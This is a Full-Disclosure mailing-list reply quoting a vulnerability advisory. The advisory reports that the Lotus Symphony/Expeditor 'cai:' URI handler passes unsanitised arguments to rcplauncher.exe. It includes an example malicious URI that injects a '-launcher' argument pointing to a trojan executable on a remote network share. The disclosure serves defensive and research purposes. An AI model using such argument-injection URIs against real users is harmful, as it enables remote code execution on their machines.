Very nice, looks a lot like some of my work in URI handler abuse. -Nate
On 4/24/08, Thomas Pollet <[EMAIL PROTECTED]> wrote: > > Hello, > > I have found that the lotus expeditor rcplauncher as installed by lotus > symphony and possibly other products, registers a cai: uri handler. > This handler executes > "D:\Program Files\IBM\Lotus\Symphony \framework\rcp\rcplauncher.exe" > -config notes -com.ibm.rcp.portal.app.ui#openCA "%1" > the rcplauncher process accepts various arguments which can be abused to > execute arbitrary code. > The argument to the -launcher option for example is an executable that will > be executed. > > malicious uri example: > cai:"%20-launcher%20\\6.6.6.6\d$\trojan > > Regards, > Thomas Pollet <http://thomas.pollet.googlepages.com/> > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/